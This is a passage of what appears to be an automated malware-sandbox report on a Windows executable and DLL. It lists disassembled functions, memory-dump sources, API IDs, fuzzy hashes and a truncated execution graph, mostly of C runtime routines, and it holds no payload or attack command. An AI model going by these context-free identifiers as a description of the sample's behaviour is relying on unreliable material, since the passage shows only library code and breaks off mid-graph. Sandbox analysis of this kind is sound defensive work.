                                                                                        • Associated: 00000004.00000002.2271452651.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271467117.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271479904.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ffe1a510000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                        • String ID:
                                                                                        • API String ID: 2933794660-0
                                                                                        • Opcode ID: 540efdc4acb7237d38814a0210c5b4881e051432956c40de0382b68ade111df8
                                                                                        • Instruction ID: 99074bbcaeb6ee96d02f745326b2312403cfb503c9c3e2833dcdd3fb923fde4c
                                                                                        • Opcode Fuzzy Hash: 540efdc4acb7237d38814a0210c5b4881e051432956c40de0382b68ade111df8
                                                                                        • Instruction Fuzzy Hash: 53111C26B18F018AEB008BA1E8556B833A5F75AB68F440A72DA6D467B4EF7CD159C340
                                                                                        Function 0000000140013670 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateEvent$CriticalInitializeSection
                                                                                        • String ID:
                                                                                        • API String ID: 926662266-0
                                                                                        • Opcode ID: 6e7557a2c0ebfea515044b23bc829654ad5a6134d5329468471647cedafa6715
                                                                                        • Instruction ID: 312f8d8d13b8a868d26f937b45fb8075aed367f1a83d8c92d196673213f535ba
                                                                                        • Opcode Fuzzy Hash: 6e7557a2c0ebfea515044b23bc829654ad5a6134d5329468471647cedafa6715
                                                                                        • Instruction Fuzzy Hash: 8F015A31610F0582E726DFA2B855BCA37E2F75D385F854529FA4A8B630EF3A8145C700
                                                                                        Function 00007FFE1A515C00 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 163COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271432825.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271420314.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271452651.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271467117.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271479904.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ffe1a510000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: __except_validate_context_record
                                                                                        • String ID: csm$csm
                                                                                        • API String ID: 1467352782-3733052814
                                                                                        • Opcode ID: 7b854735182fbbf9032f6bb379489979c6e7540e10eb2e5c3fda445f13d9ec39
                                                                                        • Instruction ID: cc163d2ed52992b12ccb5b176fd598443197ca996c9be1a7dd019399f5a25fae
                                                                                        • Opcode Fuzzy Hash: 7b854735182fbbf9032f6bb379489979c6e7540e10eb2e5c3fda445f13d9ec39
                                                                                        • Instruction Fuzzy Hash: 79718272B0CA818AD7608F26D444B7D7BA2EB06FA8F1881F6DE4C47AA5CB3CD551C740
                                                                                        Function 00007FFE1A516298 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271432825.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271420314.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271452651.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271467117.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271479904.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ffe1a510000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateFrameInfo__except_validate_context_record
                                                                                        • String ID: csm
                                                                                        • API String ID: 2558813199-1018135373
                                                                                        • Opcode ID: fdc43af78747129a673bd1320e44d2e2152711131f73500a528a0e9cffec3944
                                                                                        • Instruction ID: 17a6df69f5b8bd89d9d2f92c59730d1f10af3a9a6bddec5e78e0965cb6eeaf45
                                                                                        • Opcode Fuzzy Hash: fdc43af78747129a673bd1320e44d2e2152711131f73500a528a0e9cffec3944
                                                                                        • Instruction Fuzzy Hash: 71514D3671DB4196D660AF16A04127D7BA5FB8AFB0F1005B6EB8D07B66DF38E451CB00
                                                                                        Function 00007FFE1A51EA8C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271432825.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271420314.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271452651.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271467117.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271479904.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ffe1a510000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorFileLastWrite
                                                                                        • String ID: U
                                                                                        • API String ID: 442123175-4171548499
                                                                                        • Opcode ID: 1bda24f103a1684070c02434e8f6c76fd55582b454c16690d6623519bbb42c9a
                                                                                        • Instruction ID: e5cc03a6032945dbccd653eb8707596d6f43ec8a5330c4b63f0d1ae64d07c29a
                                                                                        • Opcode Fuzzy Hash: 1bda24f103a1684070c02434e8f6c76fd55582b454c16690d6623519bbb42c9a
                                                                                        • Instruction Fuzzy Hash: FE41A562B1DA4181DB20CF66E4443BA7762FB99BA4F4541B2EE4E877A4EF3CD441CB40
                                                                                        Function 0000000140012523 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExceptionRaise
                                                                                        • String ID: csm
                                                                                        • API String ID: 3997070919-1018135373
                                                                                        • Opcode ID: dba88b77ed38871436108f768fa7b3f2c7bfcf036fc2a4a051b753ac1ce5513b
                                                                                        • Instruction ID: 49e9958dea4625aba6399e71a496f31833793ec74c7c4936f150dd50c3eb5df3
                                                                                        • Opcode Fuzzy Hash: dba88b77ed38871436108f768fa7b3f2c7bfcf036fc2a4a051b753ac1ce5513b
                                                                                        • Instruction Fuzzy Hash: 1D315036204A8082D771CF16E09079EB365F78C7E4F544111EF9A077B5DB3AD892CB41
                                                                                        Function 00007FFE1A520910 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00007FFE1A513A38: __except_validate_context_record.LIBVCRUNTIME ref: 00007FFE1A513A63
                                                                                        • __GSHandlerCheckCommon.LIBCMT ref: 00007FFE1A520993
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271432825.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271420314.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271452651.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271467117.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271479904.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ffe1a510000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: CheckCommonHandler__except_validate_context_record
                                                                                        • String ID: csm$f
                                                                                        • API String ID: 1543384424-629598281
                                                                                        • Opcode ID: df4735a4e908aa111fba586a5857847e844898d503be1ccfbed92f1abe6d2401
                                                                                        • Instruction ID: 4767d3139cfe538b553dffc3081010f9f75b09a9a966cdfcf56a0960c06ceb7d
                                                                                        • Opcode Fuzzy Hash: df4735a4e908aa111fba586a5857847e844898d503be1ccfbed92f1abe6d2401
                                                                                        • Instruction Fuzzy Hash: 9211E172B18B81C5E7549F23A0411B97B66EB46FE0F0880B6EE880BB66CE38DC51C700
                                                                                        Function 0000000140003620 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: TimerWaitable
                                                                                        • String ID: amps_Set: pHandle=%p, propId=%d, val=%p, vSize=%d
                                                                                        • API String ID: 1823812067-484248852
                                                                                        • Opcode ID: 590ed17bb6164494f623543e183e49ebce91c212c09f63c64337d20ba62503d7
                                                                                        • Instruction ID: 814455377fd743a09d1ce94c7697c2570c7384a68551c8a3e3690f56dccab0e4
                                                                                        • Opcode Fuzzy Hash: 590ed17bb6164494f623543e183e49ebce91c212c09f63c64337d20ba62503d7
                                                                                        • Instruction Fuzzy Hash: 25114975608B4082EB21CF16B84079AB7A4F79DBD4F544225FF8847B79DB39C5508B40
                                                                                        Function 00007FFE1A513990 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFE1A51112F), ref: 00007FFE1A5139E0
                                                                                        • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFE1A51112F), ref: 00007FFE1A513A21
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271432825.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271420314.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271452651.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271467117.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271479904.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ffe1a510000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExceptionFileHeaderRaise
                                                                                        • String ID: csm
                                                                                        • API String ID: 2573137834-1018135373
                                                                                        • Opcode ID: 886c576564c2cc2de453fb1cc39b3a925429a78efbd1798258f32c7f13ed655c
                                                                                        • Instruction ID: 5d0314be8a28072ba4f3b46a76935b8f9882d3f4705911f625d1c289e4b4dd63
                                                                                        • Opcode Fuzzy Hash: 886c576564c2cc2de453fb1cc39b3a925429a78efbd1798258f32c7f13ed655c
                                                                                        • Instruction Fuzzy Hash: E1114C3660CF8182EB608F16E4102797BE5FB89BA4F5842B2DE8D07769EF3CD5518B00
                                                                                        Function 00000001400036E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: TimerWaitable
                                                                                        • String ID: amps_Get: pHandle=%p, propId=%d, val=%p, vSize=%d
                                                                                        • API String ID: 1823812067-3336177065
                                                                                        • Opcode ID: ec5ea581405e177efc46dfcfb63def396c6c184119c2e2df6ecfca0784b7c7fe
                                                                                        • Instruction ID: 709d983207ec740d9f2c7308925ee729c80a4ac6442fb255827ec98b57545574
                                                                                        • Opcode Fuzzy Hash: ec5ea581405e177efc46dfcfb63def396c6c184119c2e2df6ecfca0784b7c7fe
                                                                                        • Instruction Fuzzy Hash: 731170B2614B8082D711CF16F480B9AB7A4F38CBE4F444216BF9C47B68CF78C5508B40
                                                                                        Function 00000001400137D0 Relevance: 5.0, APIs: 4, Instructions: 27memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: Heap$FreeProcess
                                                                                        • String ID:
                                                                                        • API String ID: 3859560861-0
                                                                                        • Opcode ID: 57607852ce15da45032583eecf595b266eb818b51a75700467a9fc2c410260bf
                                                                                        • Instruction ID: 86a4b35954e85bb75ec39e114bccfc50e282ec3ca0152174d73c8df7cd9b4be4
                                                                                        • Opcode Fuzzy Hash: 57607852ce15da45032583eecf595b266eb818b51a75700467a9fc2c410260bf
                                                                                        • Instruction Fuzzy Hash: ADF07FB4615B4481FB078FA7B84479422E5EB4DBC0F481028AB494B3B0DF7A80998710

                                                                                        Execution Graph

                                                                                        Execution Coverage:3.7%
                                                                                        Dynamic/Decrypted Code Coverage:26.7%
                                                                                        Signature Coverage:1.3%
                                                                                        Total number of Nodes:1110
                                                                                        Total number of Limit Nodes:28
                                                                                        execution_graph 4366 254da54 4367 254da61 4366->4367 4368 254da7d 4366->4368 4367->4368 4369 254da6f DeleteCriticalSection 4367->4369 4369->4368 4369->4369 4370 b226b0 4371 b226e9 4370->4371 4372 b226dc 4370->4372 4374 b210cc __setmbcp_nolock 5 API calls 4371->4374 4373 b210cc __setmbcp_nolock 5 API calls 4372->4373 4373->4371 4381 b226f9 __except_handler4 __IsNonwritableInCurrentImage 4374->4381 4375 b2277c 4376 b22752 __except_handler4 4376->4375 4377 b2276c 4376->4377 4378 b210cc __setmbcp_nolock 5 API calls 4376->4378 4379 b210cc __setmbcp_nolock 5 API calls 4377->4379 4378->4377 4379->4375 4381->4375 4381->4376 4386 b251ca RtlUnwind 4381->4386 4382 b227cb __except_handler4 4383 b227ff 4382->4383 4384 b210cc __setmbcp_nolock 5 API calls 4382->4384 4385 b210cc __setmbcp_nolock 5 API calls 4383->4385 4384->4383 4385->4376 4386->4382 4417 b21391 4418 b213cd 4417->4418 4420 b213a3 4417->4420 4420->4418 4421 b228da 4420->4421 4422 b228e6 _raise 4421->4422 4427 b22345 4422->4427 4428 b222cc __getptd_noexit 66 API calls 4427->4428 4429 b2234d 4428->4429 4430 b2235a 4429->4430 4431 b21411 __amsg_exit 66 API calls 4429->4431 4432 b251fb 4430->4432 4431->4430 4433 b25221 4432->4433 4434 b2521a 4432->4434 4444 b22f92 4433->4444 4436 b21719 __NMSG_WRITE 66 API calls 4434->4436 4436->4433 4439 b2530a 4468 b21697 4439->4468 4440 b25232 __setmbcp_nolock 4440->4439 4442 b252ca SetUnhandledExceptionFilter UnhandledExceptionFilter 4440->4442 4442->4439 4445 b220f9 __decode_pointer 6 API calls 4444->4445 4446 b22f9d 4445->4446 4446->4440 4447 b22f9f 4446->4447 4451 b22fab _raise 4447->4451 4448 b23007 4449 b22fe8 4448->4449 4453 b23016 4448->4453 4454 b220f9 __decode_pointer 6 API calls 4449->4454 4450 b22fd2 4452 b222cc __getptd_noexit 66 API calls 4450->4452 4451->4448 4451->4449 4451->4450 4456 b22fce 4451->4456 4457 b22fd7 _siglookup 4452->4457 4455 b22c72 _raise 66 API calls 4453->4455 4454->4457 4458 b2301b 4455->4458 4456->4450 4456->4453 4460 b2307d 4457->4460 4461 b21697 _raise 66 API calls 4457->4461 4467 b22fe0 _raise 4457->4467 4459 b22c0a _raise 6 API calls 4458->4459 4459->4467 4462 b22aa0 __lock 66 API calls 4460->4462 4463 b23088 4460->4463 4461->4460 4462->4463 4464 b220f0 _raise 6 API calls 4463->4464 4465 b230bd 4463->4465 4464->4465 4471 b23113 4465->4471 4467->4440 4469 b21555 _doexit 66 API calls 4468->4469 4470 b216a8 4469->4470 4472 b23120 4471->4472 4473 b23119 4471->4473 4472->4467 4475 b229c6 LeaveCriticalSection 4473->4475 4475->4472 4387 b231b4 4388 b231c0 SetLastError 4387->4388 4389 b231c8 _raise 4387->4389 4388->4389 4390 2551652 4391 2551691 4390->4391 4392 25516ff __raise_exc 4391->4392 4393 255171c 4391->4393 4392->4393 4324 2546cfc 4325 2546d0d 4324->4325 4328 254a70f GetEnvironmentStringsW 4325->4328 4327 2546d12 4329 254a727 4328->4329 4336 254a7aa 4328->4336 4330 254a74e FreeEnvironmentStringsW 4329->4330 4331 254a759 4329->4331 4330->4336 4339 2547700 4331->4339 4333 254a760 4334 254a768 4333->4334 4337 254a779 4333->4337 4335 254a76d FreeEnvironmentStringsW 4334->4335 4335->4336 4336->4327 4338 254a7a0 FreeEnvironmentStringsW 4337->4338 4338->4336 4341 254773c 4339->4341 4342 254770e 4339->4342 4340 2547729 RtlAllocateHeap 4340->4341 4340->4342 4341->4333 4342->4340 4342->4341 4343 254161d 4344 2541626 ___security_init_cookie 4343->4344 4345 254162b 4343->4345 4344->4345 4346 25412dd 4347 254131b 4346->4347 4349 25412e8 4346->4349 4350 2541437 4347->4350 4351 2541443 4350->4351 4352 254144c 4351->4352 4353 2541474 4351->4353 4357 25414df 4351->4357 4352->4349 4354 254147e __RTC_Initialize 4353->4354 4355 25414cc 4354->4355 4356 2541493 ___scrt_uninitialize_crt 4355->4356 4356->4352 4358 254151c dllmain_raw 4357->4358 4363 2541517 4357->4363 4364 2541502 4357->4364 4359 2541536 dllmain_crt_dispatch 4358->4359 4358->4364 4359->4363 4359->4364 4360 2541588 4361 2541591 dllmain_crt_dispatch 4360->4361 4360->4364 4362 25415a4 dllmain_raw 4361->4362 4361->4364 4362->4364 4363->4360 4365 254157d dllmain_raw 4363->4365 4364->4349 4365->4360 4394 b25138 4395 b2514a 4394->4395 4397 b25158 @_EH4_CallFilterFunc@8 4394->4397 4396 b210cc __setmbcp_nolock 5 API calls 4395->4396 4396->4397 4398 254aa58 4399 254aa74 4398->4399 4400 254aa7d 4399->4400 4401 254aa8f TlsFree 4399->4401 4487 b228fe 4488 b22901 4487->4488 4489 b251fb _abort 68 API calls 4488->4489 4490 b2290d _raise 4489->4490 4402 b22d3f 4403 b23730 __calloc_crt 66 API calls 4402->4403 4404 b22d4b 4403->4404 4405 b2207e __encode_pointer 6 API calls 4404->4405 4406 b22d53 4405->4406 4495 b2235f 4497 b2236b _raise 4495->4497 4496 b22383 4500 b235ee __mtinitlocknum 66 API calls 4496->4500 4502 b22391 4496->4502 4497->4496 4498 b2246d _raise 4497->4498 4499 b235ee __mtinitlocknum 66 API calls 4497->4499 4499->4496 4500->4502 4501 b235ee __mtinitlocknum 66 API calls 4503 b2239f 4501->4503 4502->4501 4502->4503 4504 b235ee __mtinitlocknum 66 API calls 4503->4504 4505 b223ad 4503->4505 4504->4505 4506 b223bb 4505->4506 4507 b235ee __mtinitlocknum 66 API calls 4505->4507 4508 b223c9 4506->4508 4509 b235ee __mtinitlocknum 66 API calls 4506->4509 4507->4506 4510 b223d7 4508->4510 4511 b235ee __mtinitlocknum 66 API calls 4508->4511 4509->4508 4512 b223e8 4510->4512 4513 b235ee __mtinitlocknum 66 API calls 4510->4513 4511->4510 4514 b22aa0 __lock 66 API calls 4512->4514 4513->4512 4515 b223f0 4514->4515 4516 b22415 4515->4516 4517 b223fc InterlockedDecrement 4515->4517 4531 b22479 4516->4531 4517->4516 4518 b22407 4517->4518 4518->4516 4522 b235ee __mtinitlocknum 66 API calls 4518->4522 4521 b22aa0 __lock 66 API calls 4523 b22429 4521->4523 4522->4516 4524 b2245a 4523->4524 4534 b23d2d 4523->4534 4578 b22485 4524->4578 4528 b235ee __mtinitlocknum 66 API calls 4528->4498 4581 b229c6 LeaveCriticalSection 4531->4581 4533 b22422 4533->4521 4535 b2243e 4534->4535 4536 b23d3e InterlockedDecrement 4534->4536 4535->4524 4548 b23b55 4535->4548 4537 b23d53 InterlockedDecrement 4536->4537 4538 b23d56 4536->4538 4537->4538 4539 b23d63 4538->4539 4540 b23d60 InterlockedDecrement 4538->4540 4541 b23d70 4539->4541 4542 b23d6d InterlockedDecrement 4539->4542 4540->4539 4543 b23d7a InterlockedDecrement 4541->4543 4545 b23d7d 4541->4545 4542->4541 4543->4545 4544 b23d96 InterlockedDecrement 4544->4545 4545->4544 4546 b23da6 InterlockedDecrement 4545->4546 4547 b23db1 InterlockedDecrement 4545->4547 4546->4545 4547->4535 4549 b23bd9 4548->4549 4554 b23b6c 4548->4554 4550 b23c26 4549->4550 4551 b235ee __mtinitlocknum 66 API calls 4549->4551 4567 b23c4d 4550->4567 4606 b25ae1 4550->4606 4553 b23bfa 4551->4553 4558 b235ee __mtinitlocknum 66 API calls 4553->4558 4554->4549 4557 b23ba0 4554->4557 4561 b235ee __mtinitlocknum 66 API calls 4554->4561 4556 b23bc1 4559 b235ee __mtinitlocknum 66 API calls 4556->4559 4557->4556 4568 b235ee __mtinitlocknum 66 API calls 4557->4568 4563 b23c0d 4558->4563 4564 b23bce 4559->4564 4560 b23c92 4565 b235ee __mtinitlocknum 66 API calls 4560->4565 4566 b23b95 4561->4566 4562 b235ee __mtinitlocknum 66 API calls 4562->4567 4570 b235ee __mtinitlocknum 66 API calls 4563->4570 4573 b235ee __mtinitlocknum 66 API calls 4564->4573 4574 b23c98 4565->4574 4582 b25cbb 4566->4582 4567->4560 4569 b235ee 66 API calls __mtinitlocknum 4567->4569 4571 b23bb6 4568->4571 4569->4567 4572 b23c1b 4570->4572 4598 b25c76 4571->4598 4577 b235ee __mtinitlocknum 66 API calls 4572->4577 4573->4549 4574->4524 4577->4550 4694 b229c6 LeaveCriticalSection 4578->4694 4580 b22467 4580->4528 4581->4533 4583 b25cc8 4582->4583 4597 b25d45 4582->4597 4584 b25cd9 4583->4584 4585 b235ee __mtinitlocknum 66 API calls 4583->4585 4586 b25ceb 4584->4586 4587 b235ee __mtinitlocknum 66 API calls 4584->4587 4585->4584 4588 b235ee __mtinitlocknum 66 API calls 4586->4588 4591 b25cfd 4586->4591 4587->4586 4588->4591 4589 b25d21 4594 b25d33 4589->4594 4595 b235ee __mtinitlocknum 66 API calls 4589->4595 4590 b25d0f 4590->4589 4593 b235ee __mtinitlocknum 66 API calls 4590->4593 4591->4590 4592 b235ee __mtinitlocknum 66 API calls 4591->4592 4592->4590 4593->4589 4596 b235ee __mtinitlocknum 66 API calls 4594->4596 4594->4597 4595->4594 4596->4597 4597->4557 4599 b25c83 4598->4599 4605 b25cb7 4598->4605 4600 b235ee __mtinitlocknum 66 API calls 4599->4600 4602 b25c93 4599->4602 4600->4602 4601 b235ee __mtinitlocknum 66 API calls 4603 b25ca5 4601->4603 4602->4601 4602->4603 4604 b235ee __mtinitlocknum 66 API calls 4603->4604 4603->4605 4604->4605 4605->4556 4607 b25af2 4606->4607 4608 b23c46 4606->4608 4609 b235ee __mtinitlocknum 66 API calls 4607->4609 4608->4562 4610 b25afa 4609->4610 4611 b235ee __mtinitlocknum 66 API calls 4610->4611 4612 b25b02 4611->4612 4613 b235ee __mtinitlocknum 66 API calls 4612->4613 4614 b25b0a 4613->4614 4615 b235ee __mtinitlocknum 66 API calls 4614->4615 4616 b25b12 4615->4616 4617 b235ee __mtinitlocknum 66 API calls 4616->4617 4618 b25b1a 4617->4618 4619 b235ee __mtinitlocknum 66 API calls 4618->4619 4620 b25b22 4619->4620 4621 b235ee __mtinitlocknum 66 API calls 4620->4621 4622 b25b29 4621->4622 4623 b235ee __mtinitlocknum 66 API calls 4622->4623 4624 b25b31 4623->4624 4625 b235ee __mtinitlocknum 66 API calls 4624->4625 4626 b25b39 4625->4626 4627 b235ee __mtinitlocknum 66 API calls 4626->4627 4628 b25b41 4627->4628 4629 b235ee __mtinitlocknum 66 API calls 4628->4629 4630 b25b49 4629->4630 4631 b235ee __mtinitlocknum 66 API calls 4630->4631 4632 b25b51 4631->4632 4633 b235ee __mtinitlocknum 66 API calls 4632->4633 4634 b25b59 4633->4634 4635 b235ee __mtinitlocknum 66 API calls 4634->4635 4636 b25b61 4635->4636 4637 b235ee __mtinitlocknum 66 API calls 4636->4637 4638 b25b69 4637->4638 4639 b235ee __mtinitlocknum 66 API calls 4638->4639 4640 b25b71 4639->4640 4641 b235ee __mtinitlocknum 66 API calls 4640->4641 4642 b25b7c 4641->4642 4643 b235ee __mtinitlocknum 66 API calls 4642->4643 4644 b25b84 4643->4644 4645 b235ee __mtinitlocknum 66 API calls 4644->4645 4646 b25b8c 4645->4646 4647 b235ee __mtinitlocknum 66 API calls 4646->4647 4648 b25b94 4647->4648 4649 b235ee __mtinitlocknum 66 API calls 4648->4649 4650 b25b9c 4649->4650 4651 b235ee __mtinitlocknum 66 API calls 4650->4651 4652 b25ba4 4651->4652 4653 b235ee __mtinitlocknum 66 API calls 4652->4653 4654 b25bac 4653->4654 4655 b235ee __mtinitlocknum 66 API calls 4654->4655 4656 b25bb4 4655->4656 4657 b235ee __mtinitlocknum 66 API calls 4656->4657 4658 b25bbc 4657->4658 4659 b235ee __mtinitlocknum 66 API calls 4658->4659 4660 b25bc4 4659->4660 4661 b235ee __mtinitlocknum 66 API calls 4660->4661 4662 b25bcc 4661->4662 4663 b235ee __mtinitlocknum 66 API calls 4662->4663 4664 b25bd4 4663->4664 4665 b235ee 